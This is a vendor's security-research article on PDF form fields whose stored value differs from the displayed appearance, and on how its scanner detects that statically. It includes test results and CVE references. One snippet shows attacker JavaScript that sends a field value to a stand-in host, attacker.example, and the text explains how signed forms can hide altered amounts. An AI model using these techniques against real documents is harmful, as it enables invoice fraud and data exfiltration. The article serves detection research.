PQ PDF Logo
PQ PDF Tools Secure document utilities for everyday workflows.
Home About Enterprise Outlook Add-in Research Contact Feedback Legal Privacy Security Development Analytics
  1. PQ PDF
  2. ›
  3. PDF Form Security

Security Research — Published 24 May 2026

PDF Forms as Executable
Security Boundaries

A PDF form field has two independent representations of its value: /V, the machine-readable data value that JavaScript reads and form submission posts, and /AP, the appearance stream that the viewer renders as pixels on screen. They are not derived from each other. A digital signature can certify both while they disagree. This is the V/AP problem — and it is structurally provable from the raw byte stream, without rendering.

Structural indicators documented in this article
  • /NeedAppearances true — when paired with a digital signature, the displayed appearance is regenerated from /V at open time and is never the signed /AP stream; what the viewer shows and what was certified have structurally different provenance
  • Checkbox and radio /V vs /AS divergence — the simplest V/AP check to verify: a pure dictionary key comparison
  • AP stream text extraction for text, listbox, and combobox fields — with /Opt export-value resolution and hex-string /V decoding
  • Field-value seeding in JavaScript behavioral analysis — why empty getField() returns cause conditional exploitation chains to be missed
  • DocMDP P=1 and DSS/LTV — the boundary ISO 32000-2 §12.8.2.2 draws between permitted and impermissible incremental updates

New — population-scale companion: PDF Forensics at Scale runs the scanner against 1,572 real-world PDFs — including 400 live malware samples — reporting live-malware detection, the real-world false-positive rate, and the files that crash a scanner (and how the engine was hardened).

Contents
  1. Background: Two Data Paths, One Signature
  2. Threat Perspective: Where V/AP Analysis Fits
  3. Five Structural Indicators: V/AP Divergence Without Rendering
  4. Live Detection: Six Test PDFs, Real Scanner Output
  5. Normal Interactive PDFs vs. Suspicious Patterns
  6. JavaScript Field-Value Conditioning
  7. DocMDP P=1 and DSS/LTV
  8. Structural Limits: What Rasterisation Cannot Provide
  9. An Open Question: DocMDP P=2
  10. Safe Handling and Configuration
  11. Detection Methodology Reference
  12. Frequently Asked Questions
  13. Research References

Background: Two Data Paths, One Signature

In auditing the incremental-update logic in our PDF forensics scanner we identified a gap: the set-difference approach to injected object detection silently passed redefined objects carrying the same object ID. Fixing that led into a deeper examination of DocMDP — how certified signatures interact with permitted incremental updates. That work surfaced a more fundamental structural problem: the relationship between what a PDF AcroForm field displays and what it stores as machine-readable data. This article documents the V/AP problem in full.

Every AcroForm field has two independent data stores:

KeyWhat it containsWho reads it
/V The machine-readable field value JavaScript (doc.getField().value), form submission (SubmitForm), digital signature byte-range hash
/AP /N A self-contained PDF content stream that the viewer renders as pixels The viewer, the user — nothing else

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Prior Research and Known Exploitation

The structural relationship between signed PDF content and rendered output has been studied in the academic literature. Mainka, Mladenov, Rohlmann, and Schwenk published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs” (NDSS 2021), identifying three attack classes — Hide, Hide-and-Replace, and Replace — that exploit the gap between the byte range a signature covers and the content the viewer renders. The disclosure reached 28 PDF viewer vendors and produced patches across Adobe Acrobat, Foxit, LibreOffice, and others. An earlier line of research by Müller, Mladenov, Somorovsky, and Schwenk (“PDF Insecurity” series, 2017–2019) systematically mapped signature-validation weaknesses across major PDF viewers, establishing the framework that later Shadow Attack work built on. ISO 32000-2:2020 introduced clarifications in response to some of these findings, though the V/AP structural separation itself is a fundamental consequence of the format’s design, not a defect that can be patched at the specification level.

In operational settings, the same mechanism is directly applicable to invoice fraud and signed financial workflows: a signed invoice PDF where an automated payment system reads /V while the human signer saw what /AP rendered. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact — no modification of the signed byte range is required, and no viewer warning is produced.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

CVEPatternMechanism
CVE-2021-28550
APSB21-29
AcroForm + getField / setFocus JavaScript Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript
CVE-2021-21017
APSB21-09
XFA + JavaScript + instanceManager Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat
CVE-2024-45112
APSB24-70
XFA/AcroForm mixed field access Type confusion triggered when a document mixes XFA and AcroForm field access in the same session — a pattern not present in legitimately authored forms
CVE-2023-21608
APSB23-01
Annotation + event.target JavaScript Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8)

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open. XFA scripting is structurally separate from AcroForm JavaScript: a scanner inspecting only AcroForm paths may not examine XFA-embedded FormCalc or JavaScript at all, since the execution model and content location differ between the two form architectures.

Threat Perspective: Where V/AP Analysis Fits

PDF-delivered threats exist across a wide spectrum of sophistication. The overwhelming majority of malicious PDFs observed in the wild do not involve form field structure at all. The high-volume threat classes are:

  • Phishing overlays — a rendered page that prompts for credentials or directs the user to an external URL. No AcroForm required; often no JavaScript.
  • Social engineering — instructions to enable content, call a number, scan a QR code, or download an attached file. Relies on user behavior, not structural manipulation.
  • JavaScript exploits targeting Acrobat’s engine — CVE-2008-2992, CVE-2009-0927, CVE-2018-4990, and more recent entries. These use JavaScript as a delivery mechanism but typically do not depend on form field data.
  • Embedded payloads via /EmbeddedFile streams, /Launch actions, or polyglot structures that contain executable content.

These are high-volume, operationally dominant attacks. They are detected through URL analysis, embedded file inspection, static JavaScript analysis, YARA pattern matching, and ClamAV signatures — not V/AP structural comparison. Commodity phishing PDFs do not need form field manipulation. They exploit user trust, not signing semantics.

V/AP divergence analysis is relevant to a different, narrower threat class: documents where the PDF form carries legal or financial authority, and where an attacker benefits from the gap between what a human reader sees and what a machine processes. The applicable scenarios are:

ScenarioWhy V/AP mattersWhere simpler analysis is sufficient
Signed financial contract Signer’s view may differ from submitted field values; digital signature certifies both Unsigned or unsigned-but-phishing documents don’t need this analysis
Automated invoice processing Payment pipeline reads /V for transaction amount; AP renders a different figure Phishing invoices asking users to wire funds directly don’t need form manipulation
Regulatory or legal submission The certified content is referenced by downstream systems as authoritative Drive-by malware delivery doesn’t require form field structure
E-signature platform forensics Contested signed documents require structural audit of what the byte range actually certified Standard AV/EDR scanning handles most commodity threats at this layer

Being explicit about scope is part of being accurate. The structural indicators in this article are most applicable to high-value signed document workflows and forensic analysis of contested PDFs. They are not the right primary tool for blocking commodity phishing PDFs, which are better addressed by URL reputation, sender analysis, and static JS inspection. Both are necessary; they target different points on the threat spectrum.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are stale by construction — they may not reflect /V. On its own this is medium severity: stale AP is common in programmatic form-fill workflows (mail merge, e-signature platforms and mail-merge tools — DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented) that update /V but skip AP regeneration before saving.

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP. The viewer regenerates the appearance after opening. The signed content and the displayed content are structurally separated — the viewer regenerates appearance from /V at open time, so what is displayed is never the signed /AP stream. The visual output may agree if /V and the stale /AP happen to contain the same value, but the provenance of what is displayed and what is certified is always structurally different.

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the simplest V/AP check to verify: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.

Three encoding cases are handled:

  • Literal string /V — /V (Hello) — extracted directly
  • Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
  • Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison

For listbox and combobox fields, /Opt can store display/export pairs: [[(United States) (us)] [(United Kingdom) (uk)]]. The /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined — it is not statically present in the file. Different viewers may render different things. Medium severity.

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44 — Correlation Engine) fire on combinations:

CombinationSeverityWhy
/NeedAppearances + digital signature Critical Signed bytes guarantee to cover a different appearance than what the viewer displays
V/AS mismatch + digital signature Critical Displayed state and certified value structurally differ within the same signed byte range
/NeedAppearances + JS or SubmitForm High Stale AP paired with active form content — the displayed values may differ from what is executed or exfiltrated
/NeedAppearances + DocMDP constraint violation Critical Uncertified modification rendered visible via viewer-regenerated appearance

Note on test scores: The Critical escalation for /NeedAppearances + digital signature fires only when both conditions are present in the same file. 01_need_appearances.pdf in the test corpus below carries no digital signature; it scores 81 (MEDIUM) — consistent with this table since the signature condition does not apply and the compound Critical indicator does not trigger.

Engine 47 aggregates findings from all upstream engines. V/AP indicators from Engine 25 (AcroForm Field Forensics) feed directly into it alongside signature forensics and JS behavioral emulation results. For the full 47-engine architecture — including how V/AP findings interact with the JS Behavioral Emulator (Engine 41) and Signature Forensics (Engine 21) — see the scanner architecture documentation →

Live Detection: Nine Test PDFs, Real Scanner Output

Each structural indicator described above was validated against a minimal hand-crafted PDF targeting that specific condition. One additional control file was built with correctly authored, matching V and AP values to check for false positives. All files were built from raw bytes without any PDF library and submitted to the scanner live. File sizes range from 707 to 1,212 bytes.

Test fileCondition plantedThreat · Deception → VerdictIndicators (n / severity)Primary indicator fired
01_need_appearances.pdf
758 bytes
/NeedAppearances true in AcroForm dict; text field with /V (12000.00), no /AP 0 · 20 → suspicious 6 total
4 medium · 2 low
[MEDIUM] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale
02_checkbox_vap_mismatch.pdf
941 bytes
Checkbox widget: /V /Yes but /AS /Off 0 · 25 → suspicious 4 total
1 high · 1 medium · 2 low
[HIGH] AcroForm: Checkbox Field “approved” — Value/Appearance State Mismatch (V=Yes, AS=Off)
03_text_vap_mismatch.pdf
913 bytes
Text field: /V (Rejected); AP stream renders “Approved” 0 · 25 → suspicious 4 total
1 high · 1 medium · 2 low
[HIGH] AcroForm: Text Field “status” — Value/Appearance Mismatch
05_missing_ap.pdf
742 bytes
Text field: /V (99750.00), no /AP key defined 0 · 10 → suspicious 5 total
3 medium · 2 low
[MEDIUM] AcroForm: Text Field “total_amount” — Has Value But No Appearance Stream
06_js_field_conditioning.pdf
1,166 bytes
OpenAction JS reading status (/V approved) and conditionally posting amount (/V 75000.00) to external URL 260 · 20 → high-risk 14 total
5 critical · 2 high · 5 medium · 2 low
[CRITICAL] OpenAction + JavaScript; [CRITICAL] YARA: Auto-Open + Executable
07_need_appearances_signed.pdf
1,206 bytes
/NeedAppearances true + structural /Sig field + /DocMDP P=2; text field /V (12000.00), no /AP 260 · 110 → high-risk 17 total
4 critical · 4 high · 6 medium · 3 low
[CRITICAL] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale; [CRITICAL] NeedAppearances + Digital Signature — Certified Content Diverges from Displayed
E4_image_ap_structural.pdf
938 bytes
Text field /V (1200.00); AP stream is an image XObject invoked via Do — no text operators present 0 · 25 → suspicious 5 total
1 high · 2 medium · 2 low
[HIGH] AcroForm: Text Field “amount” — Image-Based Appearance Stream (V Not Visually Verifiable)
E5_fieldmdp_empty_fields.pdf
1,212 bytes
FieldMDP signature with Action=Include and empty /Fields [] array — appears to lock named fields but locks none 245 · 10 → high-risk 14 total
2 critical · 4 high · 5 medium · 3 low
[HIGH] FieldMDP: Include Action With Empty /Fields — Locks Nothing
00_clean_match.pdf
707 bytes — control
Text field: /V (1200.00); AP stream renders 1200.00 via Tj operator — values agree; no /NeedAppearances 0 · 0 → clean 4 total
0 V/AP · 0 threat · structural only
No V/AP indicator fired and no threat: the control is correctly clean. The unrelated factors that previously elevated it (empty metadata, and a benign differential-parsing disagreement where MuPDF sees no AcroForm while Poppler/pdfminer do) are now booked to the neutral structural axis and do not affect the verdict. The V/AP structural checks correctly stay silent on a well-formed document.

The differential-parsing disagreement on the control file is itself empirically meaningful: three PDF parsers agree on the presence of an AcroForm in a file that MuPDF treats as having none — a parser-disagreement indicator firing on a legitimately authored, benign document.

Five scanner findings from the above runs are reproduced verbatim below.

Finding 1 — Text Field V/AP Mismatch

Severity:  HIGH
Indicator: AcroForm: Text Field "status" — Value/Appearance Mismatch
Engine:    AcroForm Field Forensics

Field "status" (xref 5): /V stores "Rejected" but the /AP /N appearance stream
(xref 7) renders "Approved". The viewer displays "Approved"; any form submission,
JavaScript getField() read, or digital signature byte-range will reference
"Rejected". The structural disagreement is provable from the raw PDF object model
without rendering.

Finding 2 — Checkbox V/AS Mismatch

Severity:  HIGH
Indicator: AcroForm: Checkbox Field "approved" — Value/Appearance State Mismatch
           (V=Yes, AS=Off)
Engine:    AcroForm Field Forensics

Field "approved" (xref 5): /V is /Yes (the stored data value) but /AS is /Off
(the appearance-state key that selects which /AP /N entry the viewer renders).
The checkbox appears unchecked to the viewer; the stored value is checked. Both
/V and /AS fall within any signed byte range — the mismatch is by construction
inside certified content.

Finding 3 — Field-Value Seeding in the JS Emulator

The JS field-conditioning test PDF reached a threat score of 260 (high-risk) on static analysis alone — held at high-risk rather than dangerous because, while “OpenAction + JavaScript” is a confirmed attack chain, the threat score stays under the dangerous band; its aggregate across all axes is 456. The relevant emulator context: Engine 25 (AcroForm Field Forensics) extracted field_values = {"status": "approved", "amount": "75000.00"} from the AcroForm field dictionaries and passed them to the JS emulator stub. Without this seeding, doc.getField('status').value returns ''; the condition '' == 'approved' is false; the app.launchURL() branch is never taken, and the emulator reports clean. With real field values, the condition evaluates correctly and any URL-launch or submit event is emitted with the actual exfiltration payload.

Finding 4 — Image-Based AP Structural Flag

Severity:  HIGH
Indicator: AcroForm: Text Field "amount" — Image-Based Appearance Stream
           (V Not Visually Verifiable)
Engine:    AcroForm Field Forensics

Field "amount": /V stores "1200.00" but the /AP /N stream (xref 5) contains
only a Do operator invoking an image XObject (xref 6) — no Tj or TJ text
operators are present. The viewer renders a rasterised image; the stored /V
value is not derivable from the AP stream without image recognition. The
structural anomaly is deterministic: Do present, text operators absent.
Manual review required to confirm whether the image content matches /V.

Finding 5 — FieldMDP Include Action With Empty Fields

Severity:  HIGH
Indicator: FieldMDP: Include Action With Empty /Fields — Locks Nothing
Engine:    Named Tree and Action Forensics

/TransformMethod /FieldMDP with Action=Include and /Fields []. An Include
action with an explicit field list locks only the named fields; an empty
list locks none. The signature structure certifies the document while
leaving every AcroForm field modifiable post-signing. Validators that
check for FieldMDP presence without inspecting the locked-field set will
report a valid field-integrity certification that provides none.

A note on the scores: every V/AP positive here carries no execution vector, so its threat score is ~0 — it is the Deception (content-integrity) axis that grades them, which is why each reads suspicious or high-risk on its V/AP or signature finding rather than being dismissed as low. The signature-tampering cases (07, E5) grade on the integrity portion of the threat axis. Production forms behave identically: low/zero threat, and the V/AP checks stay silent unless value and appearance genuinely diverge.

Complete Corpus: False-Positive and False-Negative Testing

196 PDF files were submitted to the scanner across six categories: hand-crafted V/AP positive and negative test files, real-world US government tax and agency forms, US federal legislation, academic papers, and Corkami proof-of-concept adversarial files (deliberately malformed or structurally unusual PDFs used for PDF parser research). All 196 were successfully scanned (the blank-AP edge case that previously returned no usable response now scans cleanly and fires its V/AP indicator). All predictions for positive test files were stated before scanning.

CategoryFilesPredictionResult
Structural V/AP positive cases (hand-crafted) 9 scanned V/AP indicator should fire 9 / 9 detected — 100%
Evasion: hex-encoded /V (E1) 1 Hex-decode handles this — should detect Detected [HIGH] Value/Appearance Mismatch
Evasion: Unicode confusable in /V (E2) 1 Byte-level comparison catches it — should detect Detected [HIGH] Value/Appearance Mismatch
Evasion: font encoding remap (E3) 1 Font glyph table now parsed — should detect Detected [HIGH] Value/Appearance Mismatch — /Encoding /Differences resolved; rendered text 9200.00 vs /V 1200.00. Deception 75 → high-risk.
Hand-crafted clean controls (text, checkbox, listbox) 3 No V/AP indicator 0 / 3 false positives
Tool-generated clean PDFs (qpdf, pdflatex, wkhtmltopdf) 3 No V/AP indicator 0 / 3 false positives
IRS tax forms — 44 real AcroForm documents
W-9, W-4, 1040, 941, 1120, 1065, 433-A, 1099-NEC, and 37 others. Real JavaScript (field calculations), embedded files, XFA fields, ObjStm. Under the multi-axis verdict these now correctly read low (threat 20–45) — their JavaScript, embedded files and XFA are neutral form-authoring capability on the structural axis, not threat — with zero V/AP indicators. (An earlier single-score model rated the same forms 328–486/“suspicious”; correcting that false elevation while keeping V/AP silent is exactly what the axis split achieves.)
44 No V/AP indicator 0 / 44 false positives
US agency forms (VA-10091, VA-40-1330) 2 No V/AP indicator 0 / 2 false positives
US federal legislation — GovInfo PDFs
Infrastructure Investment and Jobs Act, Consolidated Appropriations Act 2021, Tax Cuts and Jobs Act 2017, CARES Act.
4 No V/AP indicator 0 / 4 false positives
Academic papers from arXiv — 29 documents
Range of 2023–2025 papers across CS, physics, and mathematics. Standard pdflatex output; no AcroForms.
29 No V/AP indicator 0 / 29 false positives
Corkami PDF PoC adversarial files — 102 documents
Deliberately malformed or structurally unusual PDFs: truncated xrefs, PDF version mismatches, orphaned objects, compressed object streams, JavaScript obfuscation, signature edge cases, encoding tricks. Used for differential-parser research.
102 No V/AP indicator 0 / 102 false positives
MetricValueScope caveat
V/AP detection rate 9 / 9 — 100% All 9 positive cases scanned and detected (the blank-AP edge case now scans cleanly and fires its V/AP indicator); 0 false negatives after font-encoding-remap fix
False-positive rate 0 / 187 — 0.00% Across 44 IRS forms, 2 agency forms, 4 federal publications, 29 arXiv papers, 102 Corkami PoC files, 6 hand-crafted and tool-generated clean controls
Confirmed false negatives 0 E3 font encoding remap was the only known FN; now detected after /Encoding /Differences glyph table resolution was added to AP text extraction
Evasion attempts tested 3 built and scanned; 1 additional structural test E1 detected, E2 detected, E3 detected (after fix); image-based AP structurally detected (Do operator without text operators); whitespace normalisation and encrypted AP remain outside scope
Independent replication None All tests by the authors; test files and generation scripts available for independent replication

A noteworthy secondary finding concerns how those 44 IRS forms are scored overall. They carry JavaScript field-calculation objects, embedded file attachments, XFA form structures and ObjStm compressed object streams — all legitimate interactive-form authoring features. Under the multi-axis verdict these are classified as neutral capability on the structural axis, not threat, so all 44 forms now score low (threat 20–45) with zero V/AP indicators. An earlier single-score model summed those same features into 328–486 points and rated the forms suspicious, then relied on a special-case “form-document context gate” to walk the level back — a patch over a scoring model that conflated capability with threat. The axis split removes the need for that gate: presence of form JavaScript or embedded files no longer inflates the malware verdict in the first place, while the V/AP checks remain free to fire the instant a field’s value and appearance genuinely diverge. The checks correctly separate AcroForm field-value divergence (content integrity) from the active-content capability that legitimately authored government forms routinely carry.

The 102 Corkami PoC adversarial files include PDFs with intentionally broken structure: orphaned xref tables, version header mismatches across parsers, compressed object streams, obfuscated JavaScript, and signature edge cases. None triggered a V/AP indicator. The checks require an AcroForm widget with both /V and /AP keys present — a combination structurally absent from the deliberately minimal Corkami test files.

This is engineering validation on a controlled corpus, not a formal empirical study. The 0/187 false-positive rate covers 187 files across six distinct source categories; the 9/9 detection rate covers all scanned positive cases only. Neither figure generalises to the full population of PDF documents in production environments at scale. Academic validation would require a labelled corpus drawn from operational traffic, independent replication, and statistical significance analysis. That gap is real and is stated here rather than papered over.

Comparative Evaluation: Reference Tools vs. V/AP Checks

To provide context for what the structural checks contribute beyond what existing PDF libraries already expose, the core 11-file corpus (5 positive, 6 negative hand-crafted and tool-generated files) was evaluated against two reference implementations: pikepdf and pdfminer.six. These are production-quality PDF libraries widely used in security research and PDF processing pipelines. The 187-file false-positive corpus above provides the broader real-world negative coverage; the comparative evaluation uses the hand-crafted set where ground truth is unambiguous.

FileExpectedpikepdf
v9.x — NeedAppearances
+ checkbox /V vs /AS only
pdfminer.six
v20251230 — field
enumeration only
This scanner
AP stream text
extraction + all checks
01_need_appearances.pdf Positive✓ Detected✗ Missed✓ Detected
02_checkbox_vap_mismatch.pdf Positive✓ Detected✗ Missed✓ Detected
03_text_vap_mismatch.pdf Positive✗ Missed✗ Missed✓ Detected
05_missing_ap.pdf Positive✗ Missed✗ Missed✓ Detected
06_js_field_conditioning.pdf Positive✗ Missed✗ Missed✓ Detected
00_clean_match.pdf Negative✗ No indicator✗ No indicator✗ No indicator
00b_clean_checkbox.pdf Negative✗ No indicator✗ No indicator✗ No indicator
00c_clean_listbox_opt.pdf Negative✗ No indicator✗ No indicator✗ No indicator
C1_qpdf_generated.pdf Negative✗ No indicator✗ No indicator✗ No indicator
C2_pdflatex_clean.pdf Negative✗ No indicator✗ No indicator✗ No indicator
C3_wkhtmltopdf_invoice.pdf Negative✗ No indicator✗ No indicator✗ No indicator
MethodDetection rate (5 positives)FP rate (6 negatives)What it can detect
pikepdf (direct library) 2 / 5 — 40% 0 / 6 — 0% /NeedAppearances true; checkbox /V vs /AS key comparison. Cannot parse AP stream text operators.
pdfminer.six (direct library) 0 / 5 — 0% 0 / 6 — 0% Field enumeration only. No V/AP comparison capability in the library API.
This scanner 5 / 5 — 100% 0 / 6 — 0% All five checks: NeedAppearances, checkbox /AS, AP stream text extraction (Tj/TJ operators), blank AP, missing AP — plus /Opt export-value resolution and hex-string /V decoding.

pikepdf misses the text-field AP-stream cases (03, 05, 06) because AP stream text extraction requires decompressing the /AP /N content stream, parsing Tj/TJ operators, and PDF-unescaping the result — none of which is exposed in pikepdf’s high-level API. Detecting those cases requires building on top of the library, not just calling it. This is the implementation work documented in the “Five Structural Indicators” section.

Reproducible Methodology

The complete test procedure is reproducible from this description:

  1. Corpus construction. Positive test files were built from raw PDF bytes by hand — a Python script emitting raw PDF tokens, not calling any PDF library. Each file targets exactly one structural condition. Negative files fall into six categories: hand-crafted clean PDFs; tool-generated PDFs (qpdf --generate-appearances, pdflatex, wkhtmltopdf); 44 US IRS tax forms and 2 US VA agency forms downloaded from their respective official government domains; 4 US federal legislative texts from GovInfo (govinfo.gov); 29 academic papers from arXiv; and 102 Corkami PDF proof-of-concept adversarial files from the corkami/pocs repository (deliberately malformed or structurally unusual PDFs used for PDF parser research). Evasion files used the same raw-byte method with targeted structural variations: hex-encoded /V, Unicode confusable characters, and a custom /Font with /Encoding /Differences remapping a digit glyph. All test files and generation scripts are available from the authors on request.
  2. Scanner under test. HTTP POST to https://pqpdf.com/api.php with operation=pdf-scan and the PDF as a multipart file upload — the same endpoint that powers the interactive scanner at pqpdf.com. Response is JSON with an indicators array; each indicator has a key, risk level, and description.
  3. Classification criterion. A file is classified as a V/AP positive detection if any indicator key contains one of the following scanner-specific strings (tight match against actual engine output): Value/Appearance, NeedAppearances, Has Value But No Appearance, Blank AP Stream, No Appearance Stream, Stored Appearance Streams Stale, Appearance State Mismatch. Generic terms such as “Mismatch” were excluded to avoid conflating V/AP results with unrelated differential-parser indicators (e.g. “PDF Version Mismatch”).
  4. Reference tool evaluation. pikepdf evaluated programmatically: /NeedAppearances flag check + /FT /Btn fields /V vs /AS string comparison. pdfminer.six evaluated via field enumeration; no V/AP comparison available in the library API.
  5. Prediction before scanning. For evasion files, the expected outcome (detected/not detected) was stated in the generation script comment before the file was submitted to the scanner.

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

FeatureNormal useSuspicious pattern
AcroForm + JavaScript Field validation, conditional field visibility, submit-to-URL on a known endpoint Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value
/NeedAppearances true Programmatic form fill where AP regeneration is deferred (e-signature platforms including DocuSign — observed behavior; mail merge) /NeedAppearances true combined with a digital signature — displayed appearance is regenerated from /V at open time and is never the signed /AP stream; structural provenance of what is displayed and what is certified always differs
/V vs /AS on a checkbox Should always match in a well-formed document Structural mismatch: /V /Yes but /AS /Off — the stored value and displayed state disagree by construction
AP stream text vs /V Should agree after /Opt export-value resolution AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty
DocMDP P=1 + incremental update DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file — returning a stub { value: '' } for every field is the natural default when field enumeration and JS emulation run as independent passes without sharing state.

The practical consequence: when malicious JavaScript reads a field value and acts on it — submitting it to a URL, using it in a conditional branch, passing it to app.launchURL() — the emulator captured the event with an empty string rather than the actual content. Exploitation chains conditioned on field values were not followed correctly:

// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever — not form fill-ins, not annotations, nothing. A nave implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation will violate on a large class of legitimately authored documents.

The relevant specification text is ISO 32000-2 §12.8.2.2 NOTE 2, which explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow — it does not modify the certified document content in any MDP sense. Every legitimately LTV-enabled P=1 document was being flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.

Note on scope: FieldMDP and V/AP

File MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields — specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

FieldMDP is directly relevant to V/AP because it controls which specific field values fall within the coverage of an approval signature. An attacker can craft a FieldMDP that selectively excludes target fields, leaving their values modifiable post-signing while the document carries a valid certification. Three checks are applied: (1) Action=Include with an empty /Fields array — the signature appears to lock fields but locks none; (2) Action=Exclude with named fields — those fields are explicitly not locked, remaining modifiable and V/AP-divergence-susceptible after signing; (3) incremental updates containing /Widget or /AcroForm objects added after a FieldMDP signature — a constraint violation detectable across Acrobat and pdf.js, where validators differ on whether field names are checked against the locked set.

Structural Limits: What Rasterisation Cannot Provide

There is a principled boundary for how far static V/AP analysis can go without rasterisation. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

  • Renderer-specific differences — MuPDF and Ghostscript render the same field differently
  • Font fallback differences — missing fonts produce different glyphs on different systems
  • DPI-dependent text segmentation — results change with render resolution
  • OCR nondeterminism — the same raster produces different strings across runs
  • Language-model bias — OCR engines correct toward plausible words, hiding injected content
  • False-positive rates that break the guarantees a forensics engine must provide
  • Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream — the cases where the file and the display disagree by construction — is covered by the five checks described above. Two cases remain that static analysis cannot fully resolve:

  • Encrypted fields. When the PDF is encrypted and field values or AP streams require a key to decompress, static extraction of /V or AP content is not possible without the password. These checks apply to unencrypted or successfully decrypted content.
